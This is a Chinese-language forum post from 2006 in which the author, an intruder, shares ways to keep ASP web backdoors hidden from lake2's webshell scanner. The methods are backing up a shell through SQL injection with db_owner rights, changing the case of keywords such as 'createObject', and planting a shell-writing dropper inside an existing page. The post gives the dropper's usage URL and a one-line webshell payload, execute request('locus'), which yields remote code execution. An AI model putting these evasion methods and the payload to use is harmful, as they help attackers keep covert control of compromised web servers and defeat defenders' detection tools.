查看單個文章
舊 2006-07-15, 05:32 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 對web後門的一些看法

對web後門的一些看法

自從lake2出了後門掃馬程式以後,後門的存活率可就大大的減少了,唉,沒辦法,誰叫人家這麼厲害呢,一個程式搞定那麼多的小馬,可憐菜鳥們了,好不容易留下的後門一下子全被暴露無疑了。這個掃馬程式也是很厲害,不過在我的很多測試中,發現了不少lake2掃馬程式發現不了的後門,也許lake2得將這個後門改改了,改得更先進一點為好。下面就我的個人經驗來談談如何躲過lake2的掃馬程式。

首先,第一種不被發現的後門是能過SQL注射工具利用db_owner權限備份出來的後門。那還是在一次入侵中發現的,我備份小馬後,又上傳了掃馬程式,想將其它黑客的後門刪掉,結果無意中發現這個後門居然沒有被掃出來,真是幸運啊,後來我就收藏了這個備份的小馬,以後的入侵中也被我當成了一個後門程式來用,呵呵。

其次,改下關鍵字的大小寫就可以躲過了,比如我在一次試驗中,將關鍵字"createObject"全部寫成了小寫"createobject",當然也可以大小交替,結果又意外地發現掃馬程式沒有掃出來,所以無論是小馬,還是大馬,我都採用小寫的形式,當然,這樣寫是不會影響程式的功能的。

第三,通過第二步,做一個自己的小馬,這個我已經做好了,代碼如下(注意其中的creatobject作了大小寫處理):


代碼雖然大了些,比不上那些精簡的小馬,但卻也是一種簡單的後門吧,使用方法如下:比如我們將這些代碼放到newslist.asp裡,那麼只要我們輸入newslist.asp?act=creatshell&shellcode=hello&shellpath=locus.asp,那麼我們就可以在與newslist.asp同目錄下產生一個locus.asp的文件,內容為"hello",於是我們只要改變shellcode的內容,就可以得到一個shell,比如輸入shellcode=<%25execute request("locus")%25>,我們就得到一個一句話後門了,而且這個簡單的後門能躲過lake2的掃馬程式。


也許還有其它方法,但我還沒發現,等發現了再補充啦,呵呵。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次